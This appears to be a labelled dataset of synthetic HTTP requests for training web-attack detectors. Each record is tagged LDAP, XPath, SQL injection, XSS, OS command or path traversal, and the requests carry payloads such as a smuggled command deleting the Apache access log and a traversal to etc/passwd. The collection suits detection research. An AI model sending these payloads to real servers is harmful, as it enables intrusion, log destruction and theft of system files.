Authorization: NTLM ZWwwNzVxdzVtdnJpOHZoMGFkbXVPdXJzZGNheGFqc2RsZWVzaXQ=
Range: 925705-880015,-14,-60
Referer: /itgae/9hCtt/etizoi/yksb.msf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.3 (X11; U; Solaris 2.8; la-hr; rv:2.2.0) Gecko/57166561
UA-CPU: StrongARM
UA-Disp: 2470,688,8
UA-Pixels: 1061x625
Via: 9.2 www.e4tlmsy3.html:0, 5.6 www.eoopE.html
Transfer-Encoding: gzip
Upgrade: SemoE7/6.0, et69/4.6, 41p/4.8, tpres/9.7, oesti/2.8
X-Serial-Number: 237531832779
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rr=90&arSb5thrq=gbetweenntos1tlandeu4f&egnd=31&sAhdR=163760&trepargInli=8bKb3&ecreRs=)i3eertl&pcfi76iesmi=2241636437&lDot7inAera=60098&2qbwVV@2J= eele&$ wgettAe@ies5l&temy=056&Elxlwny=oN@hA-yh75

End - Id: 39857
Start - Id: 37853
class: LdapInjection
GET /ryirralao/cCR@KA9aNce5Pn/75ZlKmGM/c4EHGnx/7etleec8uoeicqendn3/soseughtdOcSw0Aq.exe?oqn=eNeoeth&HPij2zzzJ82=m%27%7Cad%27dperlhUn%5D&imjXh=6734%29%28%26%28objectClass%3Dmoi%29%28%7C%28sn+++%3D+++3e5%29%28cn%3Droe7+++++J*%29%29&OMOoptFi-=Hxp_bst+2l+i&oe=1059084&nha0oaarg=9%3DNusrw HTTP/1.1
Host: 114.11.176.92
Connection: xAustt
Accept: image/*;q=0.0, text/*;q=0.3
Accept-Charset: utf-8;q=0.0, iso-8859-1;q=0.0
Accept-Encoding: *
Accept-Language: zs7z-rcetys;q=0.3
Cache-Control: only-if-cached
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Mon, 29 Jan 07 12:51:10 UTC
ETag: "5zNxKaSEcACZS8Il5w"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Thu, 25 Mar 04 18:39:44 GMT
If-Unmodified-Since: Mon, 11 Dec 06 17:31:08 CET
If-Match: *
If-None-Match: "TMovokovDB5iACx8bKIz"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="olkoyp9"
Authorization: shsawf 9kNre=eHyvsun6
Range: 853418-,-430
Referer: /TAiiU/racse/Ao6tnz7s.aspx
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 5.6; li-tw; rv:0.8.9) Gecko/62566760
UA-CPU: x86
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2946x657
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: identity
Upgrade: uoE/5.1, iitjl/6.0
Warning: 054 61.133.144.15 "eokcuPnceergseehto" 
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37853
Start - Id: 38143
class: LdapInjection
GET /kih5hrmtuNwf/eh1T5TUflwyX/UXKmochaYKzzvk/iframeUQpositionpS/slhwAmrcsmnafl7s8kd/wS4al8jOTuh4btmr/htao9eeAn9rAdeRaw/osatpefrr2wpooerftic/mJ0KO64yrmoEgBO2eS/ijOavGt9fO6xe/Xnrm8lsBBc/jg7y.nsf?sgvcbgsound4aL69A=%29%28+++%7C%28i7C%3Dll*%29&nbnhif6ttdAs8at=I&pyo0D=569&1hrorE=lmads&fd4tniti1Lii=896362&unpdbtthcA5s=zue&Oi3eor=5171894&rwddom4=cqe%40drcrsht&rzrn=ano9nEbXwj&7Eo8N19TVD=08link4tNddb%2Fdeftpposition&rihnlsa=3370&S9lsJtk-DA=eHogEBe7esy9td&0rneA=4066746 HTTP/1.1
Host: 237.0.97.250:3603
Connection: close
Accept: application/postscript;q=0.4, image/png, application/*
Accept-Charset: windows-1255
Accept-Encoding: *
Accept-Language: ynlth-phi1;q=0.9, htYNSu-coofaha, 2lmmqeel-eaj;q=0.6, syoa5aq-j;q=0.5
Cache-Control: max-age=24487
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="23"
Date: Thu, 11 Jun 09 11:17:10 CET
ETag: W/"nDAIJJveFazGhbicY@"
Expect: us1nGEnf=cndIo0;sIgemuds
From: ivla@elhhEa.be
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: *
If-Range: "3.s_T6.Yxa7_4EP.C-b"
Max-Forwards: 7684
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic NWFhczNlOm9nRXNlc3M=
Range: 652463-080254,-92,5914-088
Referer: /naaesn.js
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.6 (compatible; MSIE 5.2; Win 9x; I1iorce; 2ies3at; torbsr)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: compress
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38143
Start - Id: 48980
class: XPathInjection
GET /Belj2aNtWrac/mPqV0l@F/dNiacnniedetrne/Ctitaaihgrcenuo.jpeg?4p4t=ari%29&yiataO=fopen&iyt=%263dpassthrus6%27xbij&ti=1311&rYGVD7k=%28i++%3C+++count%28Uca%2Fchild%3A%3Atext%28%29%29+and++j++%3C+++count%283hoT%2Fchild%3A%3Acomment%28%29%29++++and++k+++++%3C++++count%28oys8T9%2Fchild%3A%3A*%29++%29&s4zg4insert0=3ig8annTooN&J9NutML7z=726&lsticom5uz=73249 HTTP/1.0
Host: www.esbsfsits.gov:80
Connection: close
Accept: video/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.1, deflate;q=0.6, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 65.85.205.31
Cookie: dlesOasCoot=o@S
Cookie2: $Version="480"
Date: Sat, 04 Jun 05 15:07:33 GMT
ETag: "vGSzgvoNm.TJx8i"
Expect: ebadstio=eieer;lortft=nnt7Te
From: iewh@iaeEupId.net
If-Modified-Since: Wed, 27 Aug 08 19:55:31 GMT
If-Unmodified-Since: Sat, 21 Feb 04 06:33:42 GMT
If-Match: *
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: "@-h9Wu@nbEzc-oR"
Max-Forwards: 261
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://rian.com/mlur2ii4/8iybieRl/i7uie3e/iodecls/gtre.htm
TE: chunked;q=0.2,deflate;q=0.5,deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 2.5; 1t-ea; rv:8.6.2) Gecko/65337189
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48980
Start - Id: 47450
class: XSS
GET /DCBZunhttpsWlocation/na8ytiMA/Bgu/rU7@pO3Nyf.IZ4wRF5/meeurieiniflnn/rwwOshenaenlzg/YUVU/nNrYHuB.jpeg?rtoAx=sdocument%2Fx&hnr8=oh&te7oz=%3Cdiv+++style++%3D++++%22+++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.rimaasis.com%2Fscript%2Fstopweto.swf%5D%29%3B++%22++++%3E&gehslNn=43&7eohHuior=input&eqeuee=80572248 HTTP/1.0
Host: 106.101.97.125:1
Connection: keep-alive
Accept: video/quicktime, application/x-tar
Accept-Charset: us-ascii
Accept-Encoding: compress, identity;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 240.24.234.3
Cookie: afhhl6od3armetu=tLwXihzp;j9i1lgtdaSd3a=77;ytaJohr=pJic
Cookie2: $Version="073"
Date: Mon, 25 Dec 06 20:13:57 CET
ETag: "U5M.V.6GiVUtXHXYQ5NI"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 22 Sep 04 21:25:32 CET
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "y4aOGzYbVyyNL_VM"
If-None-Match: *
If-Range: "60VbaHM_D1OFTdgY-"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="eiunos"
Range: 9547-817639
Referer: http://www.zhtuhh.uk/flm0hct/m8sute/tdwtice/sLtarN5.sh
TE: chunked
Trailer: From
User-Agent: Mozilla/4.6 (compatible; MSIE 7.3; WinNT; xiEn1i)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: Ullno; roei5ks1=fs2t7t2
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47450
Start - Id: 36687
class: OsCommanding
GET /fK4aMuja0otj1D1B9h/atOhecte/jiesloeidMnpnti6ynD/iX9htol-V0d91HTaG/9hi2WL9k6dhU_U/ntmpJSMni3YRCm/le27e6wteyFhfmeEn/K1cmdRfromprocessing-instructionl9.htm?QwnYY6=ioMshri&hmnsr=cgliue&earrsue8=dFGNSfp&iu=57&vut=mmbMk&1Dtdnph1kihE4s=lapositionfgqonnullkStw&mistpa=03856764&maosehYig9lcl1N=rno%25e&nhw5t7eeLinfetn=936&8t3qtd=rcf%7Ct+tt&lti5Usaonise=cTee%3Dt1eheaouhtacces HTTP/1.1
Host: 83.254.132.4
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate
Accept-Language: *;q=0.0
Cache-Control: max-stale=96903
Client-ip: 57.185.215.69
Cookie: 2DFcmywE.=%0arm   -f /var/log/httpd/access_log;;uyWprocessing-instructionpsN=THrkrxuwna;xHTjechoX=92;7sesaambN=04218;shnn1T=ar1fqXX3aaZ;o5rq6idtRca4r3n=jh2
Date: Fri, 11 Jul 08 16:06:58 GMT
ETag: "7i8Ocp.l-xLKPWS4"
From: esepusj@spzi2ttr.net
If-Modified-Since: Sat, 10 May 08 19:07:48 CET
If-Unmodified-Since: Sun, 08 Mar 09 10:48:07 CET
If-Match: *
If-None-Match: "@p5DEDxSoR1TOGm7jPQ9"
If-Range: Mon, 04 Jun 07 05:48:54 UTC
Max-Forwards: 5463
MIME-Version: 0.0
Pragma: flyy='er91ers'
Authorization: Digest opaque="4Soe8sgg"
Referer: /uytaex/ers6oaa/l5oeI/oeul/arhfro.ace
TE: trailers,chunked
User-Agent: Mozilla/8.2 (Windows; U; Win 9x 9.0; it-7r; rv:9.0.6) Gecko/99768136
UA-OS: WinNT
UA-Color: color32
Via: 7.5 www.nHnolasd.png:96, 0.3 www.ottoed.shtml, HTTP/5.6 www.heshFry.js
Transfer-Encoding: deflate
Warning: 538 71.245.54.93 "h7D2" "Wed, 07 Nov 07 23:06:34 GMT"
----: ----------------------------------------------

null

End - Id: 36687
Start - Id: 36803
class: OsCommanding
GET /al3vglsh2w8n/aDgtGxCLbZmHu.N50/CbLlpassthruR.asp?ygtsg8nnewar8=22&Vt=la&qXZK0_eYRn94=%2Fohw&fejBru1P.za=53176519&ean=1ga%40f&wfra5cofeEntsi=%250arm++-f+++%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&BomycIt2otw=ea HTTP/1.0
Host: www.athmkeHlg.be
Connection: Emenet
Accept: */*
Accept-Charset: koi8-r, koi8
Accept-Encoding: 
Accept-Language: anmlqqDe-t;q=0.0, i-lp6p;q=0.8, 33nw-aur;q=0.0
Cache-Control: no-store
Cookie: atle8hlrsE=e4eur%;lttzw2ataTSPw=tp;oPBJT=usrnph-4kta/;Hghaving-=rp1z43;nebaxe6Bi=o0E@I;wsty5uwnm3oe=58
Date: Wed, 06 Oct 04 23:34:02 UTC
ETag: "2i-Tsg8qHsrARqq@"
Max-Forwards: 55
Authorization: Basic c2k3Q09lejp0aUNraW5kaA==
Referer: http://www.ntkgSeq.net/cesi/503mutw8/o2xhi/Ypqanrsp.mpg
User-Agent: Mozilla/0.3 (X11; U; Linux i586 1.2; a0-eh; rv:9.7.4) Gecko/54344609
Via: HTTP/7.2 63.87.189.249, 5.6 44.73.2.196:093, 8.8 159.83.69.221
Transfer-Encoding: r8mm; adof=oo0eM

null

End - Id: 36803
Start - Id: 38471
class: LdapInjection
GET /9eeine3g/ehs1cTPLb/QHqPFiw/rWT/49qYjXgSRrt4vk/0uQ/vmnyKSKe5kBa/jB3win5YHurtik/hrkyYLReVZzy@C/inputhvl4/eRrQKSby/fnfrgik2dj8teysia6h3.mdb?GL8iXYnIrcpgH=%29++%28+++%7C++++%28displayName%3Dhad*%29+++%28name%3Dhad*++%29%28mail%3Dhad*++%29&dfrmailbM25j9E=9+selfy9qr5sn&q0ebviniuefm=taorl&xu6r7u=execlHh%40 HTTP/1.0
Host: 193.129.132.86
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-tw, euc-kr;q=0.5, x-mac-arabic;q=0.6, x-mac-cyrillic;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: iaseuaq-m;q=0.1, hsea-mI, 2revqis-et;q=0.5, lsgeil-j, sSRntw-rhrti;q=0.3
Cache-Control: only-if-cached
Client-ip: 160.111.13.5
Cookie: waop14toet=tltoueoiyHoh8
Cookie2: $Version="554"
Date: Thu, 31 Jul 08 24:58:15 UTC
ETag: W/"vEDWR6w_MB0Mrrjov"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Sat, 06 Aug 05 23:56:40 UTC
If-Unmodified-Since: Wed, 30 Nov 05 24:22:49 GMT
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: *
If-Range: "kmB87cCqg7ghVVfoR"
Max-Forwards: 900
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: oct2 rwt9=noalevn
Range: 24-,76759-,-19589
Referer: http://anTrje.ch/athesM/0gNone7l/nemdps9.jsp
TE: trailers
Trailer: Trailer
User-Agent: lhhotut3sliieusss
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 907 www.zuosn.jpg "itnetiots" "Sat, 16 Aug 08 22:12:50 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38471
Start - Id: 48927
class: XPathInjection
GET /BGd/aEerrrgeSeslt/lcA-xvqcat0qksAE/RwxqvnS/DA5CFV-4/g0s1rgtleje/iicohthnh2nott4rd/4_yW/enndhtsaYsaeenevjdi/iv6r4umeaaijbNlr/rj84igtmrnnbEmc6/trtuEohmse0inGleeir.cfm?79=ttdncwipu%40t1%5Bi%25&5oehae=weeeeD&cuyshlalesTh=gtuz&1ttv=15182105&rduelttrsl=vrsxstzwbfflsgap2d&srnIedtr9i=zentpgohEa3ai4m1t&b9iecelasr=734+++++or+++++ouht%2Frdn%2Fg7a%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D++++or++5700%3D&mT=rQG1.KK4&idis=3hthnia4ar&a5tRinebn=65626923&7dbgsoundIstyleFihomeD2ef=access_logmot&fo9td=5 HTTP/1.0
Host: 201.249.215.157:8
Connection: elaedel
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dhieor-i;q=0.4, pee8-rit
Cache-Control: no-cache
Client-ip: 174.124.242.131
Cookie: Rrrwaeldnstt=8c;uoI=midsBi;vioee=t a;tyvhi=coS2;vUgK0=rhavingm3l]ldluyocat@-egroup byds
Cookie2: $Version="7"
Date: Mon, 03 Aug 09 14:04:02 GMT
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: Oetatc@0IatdnOywl.uk
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "AtDXj-Bjn46i1RJyMG"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 81
MIME-Version: 7.0
Pragma: zdrXrci='sas6'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: http://seuuwd.de/zleeMana/yl0ee/evntLc.png
TE: gzip
Trailer: Host
User-Agent: 2AWMHnXNWT http://www.rattr.org
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: 1.5 www.enieif2.htm, 8.1 www.u6tcwi.jpeg
Transfer-Encoding: dedro
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 4208976972
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48927
Start - Id: 41410
class: SqlInjection
POST /iechoE/tq8eN/tHDAZrHpUXTffdmDMUVn/gJBr-VKaUxs1lNUy7u/M59p1UZ/aQV0-HAXa1pcSNZ6z/nkpWPE6SqyZ7hii/a26N2UCsmWRVRUxs8/h9raHigeeuiptlo/tAyoO/bBY/nn.html? HTTP/1.1
Content-Length: 237
Content-Language: ravnrdos
Content-Encoding: deflate
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: WGl0bkFnb2xuZGUxaHJhag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Fri, 22 Aug 08 15:11:16 UTC
Host: www.nicSel.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 199.178.94.59
Cookie: J3processing-instructionS=c=rtt;meiaeond17zstg= b;d1efOhtooe=%itr3Mv2tstdindbvhi4;inz0Oet3Rmanar=r?dmed&eno;BWsDshutdownYROW4Nt=1hmhttpsNeb4a
Cookie2: $Version="59"
Date: Fri, 13 Mar 09 10:26:30 GMT
ETag: "BYEx6p_a1HSRDSiA@"
Expect: 100-continue
From: cTensp@smyerSeiti.st
If-Modified-Since: Tue, 02 Sep 08 22:06:57 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: *
If-None-Match: "MceWUSOt7uE07y1"
If-Range: Sun, 16 Jan 05 06:26:13 CET
Max-Forwards: 70
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM YWllaGhlbmR0aHM0dDRlNHRhNkVhZG94aWlmY3VLYXJjbmEzZGFyZTJ0cw==
Range: 24-
Referer: http://ttrotas.de/RerdC/e2t3l/litca/ohtae6.swf
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: vietwO (s.fxEsXqw9)
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1178x5140
Via: 5.8 166.231.232.58, FTP/9.0 9.198.186.114
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 593 249.185.61.208 "duOsdrnv" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.pAAqa1-OJ=fsuAsMqt4s&aehrtg2T=527&reESu=ctrtboet&jOctc=tESYs-91&katH5tTiserpsow=autoexecoaon&aare==sstriomEq&sels9hgkn=lexpThe7&oioi=aee/hes&eaiacy6wibl=262603589&zsbXfCFlunion5s='UNIONALLSELECTfieldFROMiealderiroWHERE''='

End - Id: 41410
Start - Id: 38315
class: LdapInjection
GET /dThAbtnt8olxoe/raT7/sJKFDT9c6_/.b/nBz/sdt4aeidomlah9ny/gVQIJMq/8Hgqu0Re/n@m.e8uQ7/eI.htm?tC2q1@uwWunion=nDRJHSKog6EA&uest=%29++++%28+++%7C++%28nura%3DsNo*%29 HTTP/1.0
Host: 111.65.79.70:80
Connection: rtmeiibs
Accept: image/*;q=0.6, audio/basic;q=0.6
Accept-Charset: iso-2022-kr;q=0.5, iso-8859-3;q=0.6, iso-8859-2;q=0.2, euc-jp;q=0.3
Accept-Encoding: *
Accept-Language: clzeaa-pshEi;q=0.9, retBc-nsTu6ni, oj03tTIL-wiee;q=0.2, roatrn-aeae, ia-So;q=0.9
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: o1o83CDnnflh=r;ezm= tordeau e\idtds;u4qwVFfAMp=sfo9crno;Ltkh=1394;inFboJwTL=y6antd:js9cu>z
Cookie2: $Version="35"
Date: Sun, 19 Sep 04 10:08:44 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Wed, 21 Apr 10 21:17:29 GMT
If-Unmodified-Since: Sun, 07 Oct 07 15:44:36 UTC
If-Match: *
If-None-Match: *
If-Range: "@7znIY5e@yzVbsruyqZz"
Max-Forwards: 7
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest realm
Range: 768701-8
Referer: http://sbdaPfa.biz/Sglsrn5R/0aer8n9.js
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 3.6; tw-cK; rv:6.8.9) Gecko/80933855
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/7.4 151.224.181.30
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38315
Start - Id: 35667
class: XPathInjection
GET /hMBY-7CLvTLZBM/1d4Myiesbloa/irgaieoeqsgSrfTei/qsrBSKWw/a7kQxibkprtkq/DOuu/rtI2cD..js?t8oeaco4=wmte46UsEll&SQlO=smsl%27+++++or+++++6+%3C++count%28path%2Fchild%3A%3A*%29++or++%27rl%27+++%3D++++%27&iwwsalA=htelnetnsock_streamAnn+we&rViPecho7Vg=6877696690&fwn3arx=ly HTTP/1.1
Host: 217.237.89.148
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: awsn-e, pu-na2ril;q=0.9, ea-asw6s
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: fzmng0=3;iaV2tvd=2836674512;4d=9ei3
Cookie2: $Version="33"
Date: Tue, 12 Aug 08 17:01:24 CET
ETag: "e3pjb@j9ocdjkSZAayeI"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 11 Nov 04 14:44:42 GMT
If-Unmodified-Since: Wed, 21 Feb 07 10:03:38 UTC
If-Match: "6fgZIdZSumTw0D7rvU"
If-None-Match: "TcZuF_-osidmp9Dh@NG"
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 010
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: /ennno.jsp
TE: deflate;q=0.0,gzip,trailers
Trailer: User-Agent
User-Agent: bUsUqiV http://www.ttitu.cz
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: usna/0.3 www.stumf.jpeg, 7.6 www.htle0ei.gif:9
Transfer-Encoding: identity
Upgrade: alcth4/9.0, omen/8.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35667
Start - Id: 46335
class: PathTransversal
GET /t4JnjIjxP5R-Up-yYHQ/2WDDLQm/4fvI/wS./nRGg0-x.Dm9Myd/nrU7jcaAOp/w95.Kvn/LQAnXYpxp_HeaGIK/q4x7P95U/t4heyanhmdayywieGIe/rctme.exe?atyssdt54r=hLxWD5vjL&nuDatSfnwrhl=02508120&jlmebre=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&2coeet=copyaccess_log HTTP/1.1
Host: 57.201.195.208:26136
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic, iso-8859-8-i;q=0.0, x-mac-hebrew
Accept-Encoding: *
Accept-Language: tmmalsgm-n0i;q=0.7, b-sehsy6, o-tlceourh;q=0.2
Cache-Control: 5=DootmO
Client-ip: 142.8.138.99
Cookie: Rs=6ejjatuzlocationoexe1$;acAthva=77433;Y5mform=rLthti9U
Cookie2: $Version="16"
Date: Sat, 27 Jan 07 08:54:12 CET
ETag: "cFHA7u2hDckalHKlwq"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Thu, 17 Nov 05 09:47:56 UTC
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Jan 07 18:04:25 UTC
Max-Forwards: 6665
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: josyh eeusucc9=tlhwlepi
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 11-897,103770-88,-588131
Referer: http://www.5unsrl.fr/s6Qneis/aasc3tbH/Sc1AeoEo.wav
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/6.5 (X11; U; Unix 9.0; sy-Ou; rv:5.9.5) Gecko/32712902
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3713x610
Via: FTP/6.3 154.147.197.111:0, FTP/6.2 21.191.231.200
Transfer-Encoding: compress
Upgrade: frm/0.2, 81cs/4.4, ouWo/8.1, terkqe/4.1, t3rxyn/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 57915246628562313
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46335
Start - Id: 38683
class: LdapInjection
GET /yt@uOehLmM6ye@DpmACs/thr1sAgfs2f5oed/-eCgFxtermoL8v/tE/r4mmL2ixk_pTBEJIl.tiff?arsstgeb7tee=+r&eaehlol=idk&hZOgpkGATFmD=82%29%28%26%28objectClass%3Dfcre%29%28%7C%28sn%3D++++Bhia%29%28cn%3D4o++++J*%29%29&RBYqdo_lU0=im9&rNiy9oenteis3=+%25%29tueepOOi HTTP/1.0
Host: 220.49.0.216
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.6
Cache-Control: 64='ade'
Client-ip: 82.134.209.134
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Mon, 27 Oct 08 17:43:05 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: dfkm@ocxe8.ch
If-Modified-Since: Thu, 13 Apr 06 11:19:46 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: *
If-Range: *
